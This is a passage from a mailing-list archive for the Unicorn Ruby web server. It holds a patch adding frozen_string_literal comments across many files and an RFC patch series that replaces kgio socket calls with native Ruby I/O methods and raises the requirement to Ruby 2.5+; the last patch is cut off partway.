+++ b/examples/unicorn.conf.minimal.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # Minimal sample configuration file for Unicorn (not Rack) when used
 # with daemonization (unicorn -D) started in your working directory.
 #
diff --git a/examples/unicorn.conf.rb b/examples/unicorn.conf.rb
index d90bdc4..5bae830 100644
--- a/examples/unicorn.conf.rb
+++ b/examples/unicorn.conf.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # Sample verbose configuration file for Unicorn (not Rack)
 #
 # This configuration file documents many features of Unicorn
diff --git a/ext/unicorn_http/extconf.rb b/ext/unicorn_http/extconf.rb
index 11099cd..de896fe 100644
--- a/ext/unicorn_http/extconf.rb
+++ b/ext/unicorn_http/extconf.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'mkmf'
 
 have_func("rb_hash_clear", "ruby.h") or abort 'Ruby 2.0+ required'
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 564cb30..fb91679 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'etc'
 require 'stringio'
 require 'raindrops'
diff --git a/lib/unicorn/app/old_rails.rb b/lib/unicorn/app/old_rails.rb
index 1e8c41a..54b3e69 100644
--- a/lib/unicorn/app/old_rails.rb
+++ b/lib/unicorn/app/old_rails.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # :enddoc:
 # This code is based on the original Rails handler in Mongrel
diff --git a/lib/unicorn/app/old_rails/static.rb b/lib/unicorn/app/old_rails/static.rb
index 2257270..cf34e02 100644
--- a/lib/unicorn/app/old_rails/static.rb
+++ b/lib/unicorn/app/old_rails/static.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 # This code is based on the original Rails handler in Mongrel
 # Copyright (c) 2005 Zed A. Shaw
diff --git a/lib/unicorn/cgi_wrapper.rb b/lib/unicorn/cgi_wrapper.rb
index d9b7fe5..fb43605 100644
--- a/lib/unicorn/cgi_wrapper.rb
+++ b/lib/unicorn/cgi_wrapper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # :enddoc:
 # This code is based on the original CGIWrapper from Mongrel
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index b21a01d..3c81596 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'logger'
 
 # Implements a simple DSL for configuring a unicorn server.
diff --git a/lib/unicorn/const.rb b/lib/unicorn/const.rb
index 33ab4ac..8032863 100644
--- a/lib/unicorn/const.rb
+++ b/lib/unicorn/const.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 module Unicorn::Const # :nodoc:
   # default TCP listen host address (0.0.0.0, all interfaces)
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index ab3bd6e..a48dab7 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 # no stable API here
 require 'unicorn_http'
diff --git a/lib/unicorn/http_response.rb b/lib/unicorn/http_response.rb
index 0ed0ae3..3634165 100644
--- a/lib/unicorn/http_response.rb
+++ b/lib/unicorn/http_response.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 # Writes a Rack response to your client using the HTTP/1.1 specification.
 # You use it by simply doing:
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index ed5bbf1..08fbe40 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # This is the process manager of Unicorn. This manages worker
 # processes which in turn handle the I/O and application process.
diff --git a/lib/unicorn/launcher.rb b/lib/unicorn/launcher.rb
index 78e8f39..bd3324e 100644
--- a/lib/unicorn/launcher.rb
+++ b/lib/unicorn/launcher.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # :enddoc:
 $stdout.sync = $stderr.sync = true
diff --git a/lib/unicorn/oob_gc.rb b/lib/unicorn/oob_gc.rb
index db9f2cb..efd9177 100644
--- a/lib/unicorn/oob_gc.rb
+++ b/lib/unicorn/oob_gc.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Strongly consider https://github.com/tmm1/gctools if using Ruby 2.1+
 # It is built on new APIs in Ruby 2.1, so it is more intelligent than
diff --git a/lib/unicorn/preread_input.rb b/lib/unicorn/preread_input.rb
index 12eb3e8..c62cc09 100644
--- a/lib/unicorn/preread_input.rb
+++ b/lib/unicorn/preread_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 module Unicorn
 # This middleware is used to ensure input is buffered to memory
diff --git a/lib/unicorn/select_waiter.rb b/lib/unicorn/select_waiter.rb
index cb84aab..d11ea57 100644
--- a/lib/unicorn/select_waiter.rb
+++ b/lib/unicorn/select_waiter.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # fallback for non-Linux and Linux <4.5 systems w/o EPOLLEXCLUSIVE
 class Unicorn::SelectWaiter # :nodoc:
   def get_readers(ready, readers, timeout) # :nodoc:
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 06ec2b2..986932f 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 require 'socket'
 
diff --git a/lib/unicorn/stream_input.rb b/lib/unicorn/stream_input.rb
index 9246f73..23a9976 100644
--- a/lib/unicorn/stream_input.rb
+++ b/lib/unicorn/stream_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # When processing uploads, unicorn may expose a StreamInput object under
 # "rack.input" of the Rack environment when
diff --git a/lib/unicorn/tee_input.rb b/lib/unicorn/tee_input.rb
index 2ccc2d9..b3c6535 100644
--- a/lib/unicorn/tee_input.rb
+++ b/lib/unicorn/tee_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Acts like tee(1) on an input input to provide a input-like stream
 # while providing rewindable semantics through a File/StringIO backing
diff --git a/lib/unicorn/tmpio.rb b/lib/unicorn/tmpio.rb
index 0bbf6ec..deecd80 100644
--- a/lib/unicorn/tmpio.rb
+++ b/lib/unicorn/tmpio.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :stopdoc:
 require 'tmpdir'
 
diff --git a/lib/unicorn/util.rb b/lib/unicorn/util.rb
index b826de4..f28d929 100644
--- a/lib/unicorn/util.rb
+++ b/lib/unicorn/util.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'fcntl'
 module Unicorn::Util # :nodoc:
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index 4af31be..d2445d5 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require "raindrops"
 
 # This class and its members can be considered a stable interface
diff --git a/setup.rb b/setup.rb
index cf1abd9..96cf75a 100644
--- a/setup.rb
+++ b/setup.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 #
 # setup.rb
 #
diff --git a/t/broken-app.ru b/t/broken-app.ru
index d05d7ab..5966bff 100644
--- a/t/broken-app.ru
+++ b/t/broken-app.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # we do not want Rack::Lint or anything to protect us
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
diff --git a/t/client_body_buffer_size.ru b/t/client_body_buffer_size.ru
index 44161a5..1a0fb16 100644
--- a/t/client_body_buffer_size.ru
+++ b/t/client_body_buffer_size.ru
@@ -1,4 +1,5 @@
 #\ -E none
+# frozen_string_literal: false
 app = lambda do |env|
   input = env['rack.input']
   case env["PATH_INFO"]
diff --git a/t/detach.ru b/t/detach.ru
index bbd998e..8d35951 100644
--- a/t/detach.ru
+++ b/t/detach.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentType, "text/plain"
 fifo_path = ENV["TEST_FIFO"] or abort "TEST_FIFO not set"
 run lambda { |env|
diff --git a/t/env.ru b/t/env.ru
index 388412e..86c3cfa 100644
--- a/t/env.ru
+++ b/t/env.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 run lambda { |env| [ 200, {}, [ env.inspect << "\n" ] ] }
diff --git a/t/fails-rack-lint.ru b/t/fails-rack-lint.ru
index 82bfb5f..8b8b5ec 100644
--- a/t/fails-rack-lint.ru
+++ b/t/fails-rack-lint.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This rack app returns an invalid status code, which will cause
 # Rack::Lint to throw an exception if it is present.  This
 # is used to check whether Rack::Lint is in the stack or not.
diff --git a/t/heartbeat-timeout.ru b/t/heartbeat-timeout.ru
index 3eeb5d6..ccc6a8e 100644
--- a/t/heartbeat-timeout.ru
+++ b/t/heartbeat-timeout.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 headers = { 'content-type' => 'text/plain' }
 run lambda { |env|
diff --git a/t/integration.ru b/t/integration.ru
index 888833a..6df481c 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -1,4 +1,5 @@
 #!ruby
+# frozen_string_literal: false
 # Copyright (C) unicorn hackers <unicorn-public@80x24.org>
 # License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
 
diff --git a/t/listener_names.ru b/t/listener_names.ru
index edb4e6a..f52c59b 100644
--- a/t/listener_names.ru
+++ b/t/listener_names.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 names = Unicorn.listener_names.inspect # rely on preload_app=true
diff --git a/t/oob_gc.ru b/t/oob_gc.ru
index 224cb06..2ae58a8 100644
--- a/t/oob_gc.ru
+++ b/t/oob_gc.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 require 'unicorn/oob_gc'
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
diff --git a/t/oob_gc_path.ru b/t/oob_gc_path.ru
index 7f40601..5358222 100644
--- a/t/oob_gc_path.ru
+++ b/t/oob_gc_path.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 require 'unicorn/oob_gc'
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
diff --git a/t/pid.ru b/t/pid.ru
index f5fd31f..b49b137 100644
--- a/t/pid.ru
+++ b/t/pid.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 run lambda { |env| [ 200, {}, [ "#$$\n" ] ] }
diff --git a/t/preread_input.ru b/t/preread_input.ru
index 18af221..5f68fe9 100644
--- a/t/preread_input.ru
+++ b/t/preread_input.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 require 'digest/md5'
 require 'unicorn/preread_input'
 use Unicorn::PrereadInput
diff --git a/t/reopen-logs.ru b/t/reopen-logs.ru
index c39e8f6..488da85 100644
--- a/t/reopen-logs.ru
+++ b/t/reopen-logs.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 run lambda { |env|
diff --git a/t/t0013.ru b/t/t0013.ru
index 48a3a34..e425093 100644
--- a/t/t0013.ru
+++ b/t/t0013.ru
@@ -1,4 +1,5 @@
 #\ -E none
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, 'text/plain'
 app = lambda do |env|
diff --git a/t/t0014.ru b/t/t0014.ru
index b0bd2b7..686d214 100644
--- a/t/t0014.ru
+++ b/t/t0014.ru
@@ -1,4 +1,5 @@
 #\ -E none
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, 'text/plain'
 app = lambda do |env|
diff --git a/t/t0301.ru b/t/t0301.ru
index ce68213..54929b1 100644
--- a/t/t0301.ru
+++ b/t/t0301.ru
@@ -1,4 +1,5 @@
 #\-N --debug
+# frozen_string_literal: false
 run(lambda do |env|
   case env['PATH_INFO']
   when '/vars'
diff --git a/test/aggregate.rb b/test/aggregate.rb
index 5eebbe5..0f32b2f 100755
--- a/test/aggregate.rb
+++ b/test/aggregate.rb
@@ -1,5 +1,6 @@
 #!/usr/bin/ruby -n
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 BEGIN { $tests = $assertions = $failures = $errors = 0 }
 
diff --git a/test/benchmark/dd.ru b/test/benchmark/dd.ru
index 111fa2e..5bd2739 100644
--- a/test/benchmark/dd.ru
+++ b/test/benchmark/dd.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This benchmark is the simplest test of the I/O facilities in
 # unicorn.  It is meant to return a fixed-sized blob to test
 # the performance of things in Unicorn, _NOT_ the app.
diff --git a/test/benchmark/ddstream.ru b/test/benchmark/ddstream.ru
index b14c973..fd40ced 100644
--- a/test/benchmark/ddstream.ru
+++ b/test/benchmark/ddstream.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This app is intended to test large HTTP responses with or without
 # a fully-buffering reverse proxy such as nginx. Without a fully-buffering
 # reverse proxy, unicorn will be unresponsive when client count exceeds
diff --git a/test/benchmark/readinput.ru b/test/benchmark/readinput.ru
index c91bec3..95c0226 100644
--- a/test/benchmark/readinput.ru
+++ b/test/benchmark/readinput.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This app is intended to test large HTTP requests with or without
 # a fully-buffering reverse proxy such as nginx. Without a fully-buffering
 # reverse proxy, unicorn will be unresponsive when client count exceeds
diff --git a/test/benchmark/stack.ru b/test/benchmark/stack.ru
index fc9193f..17a565b 100644
--- a/test/benchmark/stack.ru
+++ b/test/benchmark/stack.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 run(lambda { |env|
   body = "#{caller.size}\n"
   h = {
diff --git a/test/exec/test_exec.rb b/test/exec/test_exec.rb
index 8494452..807f724 100644
--- a/test/exec/test_exec.rb
+++ b/test/exec/test_exec.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # Don't add to this file, new tests are in Perl 5. See t/README
 FLOCK_PATH = File.expand_path(__FILE__)
 require './test/test_helper'
diff --git a/test/test_helper.rb b/test/test_helper.rb
index d86f83b..0bf3c90 100644
--- a/test/test_helper.rb
+++ b/test/test_helper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_ccc.rb b/test/unit/test_ccc.rb
index f518230..a0a2bff 100644
--- a/test/unit/test_ccc.rb
+++ b/test/unit/test_ccc.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 require 'socket'
 require 'unicorn'
 require 'io/wait'
diff --git a/test/unit/test_configurator.rb b/test/unit/test_configurator.rb
index 1298f0e..1a89aca 100644
--- a/test/unit/test_configurator.rb
+++ b/test/unit/test_configurator.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'test/unit'
 require 'tempfile'
diff --git a/test/unit/test_droplet.rb b/test/unit/test_droplet.rb
index 81ad82b..4b2d2d0 100644
--- a/test/unit/test_droplet.rb
+++ b/test/unit/test_droplet.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 require 'test/unit'
 require 'unicorn'
 
diff --git a/test/unit/test_http_parser.rb b/test/unit/test_http_parser.rb
index 697af44..adcc84f 100644
--- a/test/unit/test_http_parser.rb
+++ b/test/unit/test_http_parser.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_http_parser_ng.rb b/test/unit/test_http_parser_ng.rb
index 425d5ad..fd47246 100644
--- a/test/unit/test_http_parser_ng.rb
+++ b/test/unit/test_http_parser_ng.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require './test/test_helper'
 require 'digest/md5'
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index 53ae944..9d1b350 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index 7ffa48f..5a2252f 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_signals.rb b/test/unit/test_signals.rb
index 6c48754..49ff3c7 100644
--- a/test/unit/test_signals.rb
+++ b/test/unit/test_signals.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_socket_helper.rb b/test/unit/test_socket_helper.rb
index a446f06..4363474 100644
--- a/test/unit/test_socket_helper.rb
+++ b/test/unit/test_socket_helper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require './test/test_helper'
 require 'tempfile'
diff --git a/test/unit/test_stream_input.rb b/test/unit/test_stream_input.rb
index 7986ca7..7ee98e4 100644
--- a/test/unit/test_stream_input.rb
+++ b/test/unit/test_stream_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'test/unit'
 require 'digest/sha1'
diff --git a/test/unit/test_tee_input.rb b/test/unit/test_tee_input.rb
index 607ce87..8f05c77 100644
--- a/test/unit/test_tee_input.rb
+++ b/test/unit/test_tee_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'test/unit'
 require 'digest/sha1'
diff --git a/test/unit/test_util.rb b/test/unit/test_util.rb
index bc7b233..ce53b86 100644
--- a/test/unit/test_util.rb
+++ b/test/unit/test_util.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require './test/test_helper'
 require 'tempfile'
diff --git a/test/unit/test_waiter.rb b/test/unit/test_waiter.rb
index 0995de2..a20994b 100644
--- a/test/unit/test_waiter.rb
+++ b/test/unit/test_waiter.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 require 'test/unit'
 require 'unicorn'
 require 'unicorn/select_waiter'
diff --git a/unicorn.gemspec b/unicorn.gemspec
index e7e3ef7..36700a8 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 manifest = File.exist?('.manifest') ?
   IO.readlines('.manifest').map!(&:chomp!) : `git ls-files`.split("\n")
 

^ permalink raw reply related	[relevance 4%]

* [RFC 0-3/3] depend on Ruby 2.5+, eliminate kgio
@ 2023-09-05  9:44  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2023-09-05  9:44 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 1658 bytes --]

Explanation (and bulk of the work is in patch 2/3).

I wrote patch 1/3 over 4 years ago since it was simple and
didn't rely on "newer" Ruby 2.3 features.  Patch 2/3 completes
the change and actually depends on 2.5+; while patch 3/3 updates
the gemspec, docs and dependencies for Ruby 2.5+.

I haven't actually used Ruby 2.5 in a while, but I'm still on
Ruby 2.7 since that's what I have in Debian bullseye
(oldstable).

Patch 2/3 could use an extra set of eyes since it's fairly big,
but passes all tests.

Note: I can't benchmark anything since I have limited (shared)
hardware

Eric Wong (3):
  remove kgio from all read(2) and write(2) wrappers
  kill off remaining kgio uses
  update dependency to Ruby 2.5+

 HACKING                         |  2 +-
 README                          |  2 +-
 lib/unicorn.rb                  |  3 +-
 lib/unicorn/http_request.rb     | 18 ++++-----
 lib/unicorn/http_server.rb      | 38 +++++++----------
 lib/unicorn/oob_gc.rb           |  4 +-
 lib/unicorn/socket_helper.rb    | 50 +++--------------------
 lib/unicorn/stream_input.rb     | 20 +++++----
 lib/unicorn/worker.rb           | 10 ++---
 lib/unicorn/write_splat.rb      |  7 ----
 t/README                        |  2 +-
 t/oob_gc.ru                     |  3 --
 t/oob_gc_path.ru                |  3 --
 test/unit/test_request.rb       | 47 ++++++++-------------
 test/unit/test_socket_helper.rb | 72 +++++++--------------------------
 test/unit/test_stream_input.rb  |  2 +-
 test/unit/test_tee_input.rb     |  2 +-
 unicorn.gemspec                 |  5 +--
 18 files changed, 87 insertions(+), 203 deletions(-)
 delete mode 100644 lib/unicorn/write_splat.rb

[-- Attachment #2: 0001-remove-kgio-from-all-read-2-and-write-2-wrappers.patch --]
[-- Type: text/x-diff, Size: 5330 bytes --]

From 36ba7f971c571031101c0b718724bdcb06dd7e03 Mon Sep 17 00:00:00 2001
From: Eric Wong <e@80x24.org>
Date: Sun, 26 May 2019 22:15:44 +0000
Subject: [RFC 1/3] remove kgio from all read(2) and write(2) wrappers

It's fairly easy given unicorn was designed with synchronous I/O
in mind.  The overhead of backtraces from EOFError on
readpartial should be rare given our requirement to only accept
requests from fast, reliable clients on LAN (e.g. nginx or
yet-another-horribly-named-server).
---
 lib/unicorn/http_request.rb |  4 ++--
 lib/unicorn/http_server.rb  |  8 +++++---
 lib/unicorn/stream_input.rb | 20 ++++++++++++--------
 lib/unicorn/worker.rb       |  4 ++--
 4 files changed, 21 insertions(+), 15 deletions(-)

diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index e3ad592..8bca60a 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -74,11 +74,11 @@ def read(socket)
     e['REMOTE_ADDR'] = socket.kgio_addr
 
     # short circuit the common case with small GET requests first
-    socket.kgio_read!(16384, buf)
+    socket.readpartial(16384, buf)
     if parse.nil?
       # Parser is not done, queue up more data to read and continue parsing
       # an Exception thrown from the parser will throw us out of the loop
-      false until add_parse(socket.kgio_read!(16384))
+      false until add_parse(socket.readpartial(16384))
     end
 
     check_client_connection(socket) if @@check_client_connection
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index f1b4a54..2f1eb1b 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -389,12 +389,13 @@ def master_sleep(sec)
     # the Ruby itself and not require a separate malloc (on 32-bit MRI 1.9+).
     # Most reads are only one byte here and uncommon, so it's not worth a
     # persistent buffer, either:
-    @self_pipe[0].kgio_tryread(11)
+    @self_pipe[0].read_nonblock(11, exception: false)
   end
 
   def awaken_master
     return if $$ != @master_pid
-    @self_pipe[1].kgio_trywrite('.') # wakeup master process from select
+    # wakeup master process from select
+    @self_pipe[1].write_nonblock('.', exception: false)
   end
 
   # reaps all unreaped workers
@@ -565,7 +566,8 @@ def handle_error(client, e)
       500
     end
     if code
-      client.kgio_trywrite(err_response(code, @request.response_start_sent))
+      code = err_response(code, @request.response_start_sent)
+      client.write_nonblock(code, exception: false)
     end
     client.close
   rescue
diff --git a/lib/unicorn/stream_input.rb b/lib/unicorn/stream_input.rb
index 41d28a0..9246f73 100644
--- a/lib/unicorn/stream_input.rb
+++ b/lib/unicorn/stream_input.rb
@@ -49,8 +49,7 @@ def read(length = nil, rv = '')
         to_read = length - @rbuf.size
         rv.replace(@rbuf.slice!(0, @rbuf.size))
         until to_read == 0 || eof? || (rv.size > 0 && @chunked)
-          @socket.kgio_read(to_read, @buf) or eof!
-          filter_body(@rbuf, @buf)
+          filter_body(@rbuf, @socket.readpartial(to_read, @buf))
           rv << @rbuf
           to_read -= @rbuf.size
         end
@@ -61,6 +60,8 @@ def read(length = nil, rv = '')
       read_all(rv)
     end
     rv
+  rescue EOFError
+    return eof!
   end
 
   # :call-seq:
@@ -83,9 +84,10 @@ def gets
     begin
       @rbuf.sub!(re, '') and return $1
       return @rbuf.empty? ? nil : @rbuf.slice!(0, @rbuf.size) if eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
-      filter_body(once = '', @buf)
+      filter_body(once = '', @socket.readpartial(@@io_chunk_size, @buf))
       @rbuf << once
+    rescue EOFError
+      return eof!
     end while true
   end
 
@@ -107,14 +109,15 @@ def each
   def eof?
     if @parser.body_eof?
       while @chunked && ! @parser.parse
-        once = @socket.kgio_read(@@io_chunk_size) or eof!
-        @buf << once
+        @buf << @socket.readpartial(@@io_chunk_size)
       end
       @socket = nil
       true
     else
       false
     end
+  rescue EOFError
+    return eof!
   end
 
   def filter_body(dst, src)
@@ -127,10 +130,11 @@ def read_all(dst)
     dst.replace(@rbuf)
     @socket or return
     until eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
-      filter_body(@rbuf, @buf)
+      filter_body(@rbuf, @socket.readpartial(@@io_chunk_size, @buf))
       dst << @rbuf
     end
+  rescue EOFError
+    return eof!
   ensure
     @rbuf.clear
   end
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index 5ddf379..ad5814c 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -65,7 +65,7 @@ def soft_kill(sig) # :nodoc:
     end
     # writing and reading 4 bytes on a pipe is atomic on all POSIX platforms
     # Do not care in the odd case the buffer is full, here.
-    @master.kgio_trywrite([signum].pack('l'))
+    @master.write_nonblock([signum].pack('l'), exception: false)
   rescue Errno::EPIPE
     # worker will be reaped soon
   end
@@ -73,7 +73,7 @@ def soft_kill(sig) # :nodoc:
   # this only runs when the Rack app.call is not running
   # act like a listener
   def kgio_tryaccept # :nodoc:
-    case buf = @to_io.kgio_tryread(4)
+    case buf = @to_io.read_nonblock(4, exception: false)
     when String
       # unpack the buffer and trigger the signal handler
       signum = buf.unpack('l')

[-- Attachment #3: 0002-kill-off-remaining-kgio-uses.patch --]
[-- Type: text/x-diff, Size: 25476 bytes --]

From 03ec6e69fc6219a40aa8db368abe53017cd164e3 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Tue, 5 Sep 2023 06:43:20 +0000
Subject: [RFC 2/3] kill off remaining kgio uses

kgio is an extra download and shared object which costs users
bandwidth, disk space, startup time and memory.  Ruby 2.3+
provides `Socket#accept_nonblock(exception: false)' support
in addition to `exception: false' support in IO#*_nonblock
methods from Ruby 2.1.

We no longer distinguish between TCPServer and UNIXServer as
separate classes internally; instead favoring the `Socket' class
of Ruby for both.  This allows us to use `Socket#accept_nonblock'
and get a populated `Addrinfo' object off accept4(2)/accept(2)
without resorting to a getpeername(2) syscall (kgio avoided
getpeername(2) in the same way).

The downside is there's more Ruby-level argument passing and
stack usage on our end with HttpRequest#read_headers (formerly
HttpRequest#read).  I chose this tradeoff since advancements in
Ruby itself can theoretically mitigate the cost of argument
passing, while syscalls are a high fixed cost given modern CPU
vulnerability mitigations.

Note: no benchmarks have been run since I don't have a suitable
system.
---
 lib/unicorn.rb                  |  3 +-
 lib/unicorn/http_request.rb     | 14 +++----
 lib/unicorn/http_server.rb      | 30 +++++---------
 lib/unicorn/oob_gc.rb           |  4 +-
 lib/unicorn/socket_helper.rb    | 50 +++--------------------
 lib/unicorn/worker.rb           |  6 +--
 t/oob_gc.ru                     |  3 --
 t/oob_gc_path.ru                |  3 --
 test/unit/test_request.rb       | 47 ++++++++-------------
 test/unit/test_socket_helper.rb | 72 +++++++--------------------------
 test/unit/test_stream_input.rb  |  2 +-
 test/unit/test_tee_input.rb     |  2 +-
 unicorn.gemspec                 |  1 -
 13 files changed, 61 insertions(+), 176 deletions(-)

diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index b817b77..564cb30 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -1,7 +1,6 @@
 # -*- encoding: binary -*-
 require 'etc'
 require 'stringio'
-require 'kgio'
 require 'raindrops'
 require 'io/wait'
 
@@ -112,7 +111,7 @@ def self.log_error(logger, prefix, exc)
   F_SETPIPE_SZ = 1031 if RUBY_PLATFORM =~ /linux/
 
   def self.pipe # :nodoc:
-    Kgio::Pipe.new.each do |io|
+    IO.pipe.each do |io|
       # shrink pipes to minimize impact on /proc/sys/fs/pipe-user-pages-soft
       # limits.
       if defined?(F_SETPIPE_SZ)
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 8bca60a..ab3bd6e 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -61,7 +61,7 @@ def self.check_client_connection=(bool)
   # returns an environment hash suitable for Rack if successful
   # This does minimal exception trapping and it is up to the caller
   # to handle any socket errors (e.g. user aborted upload).
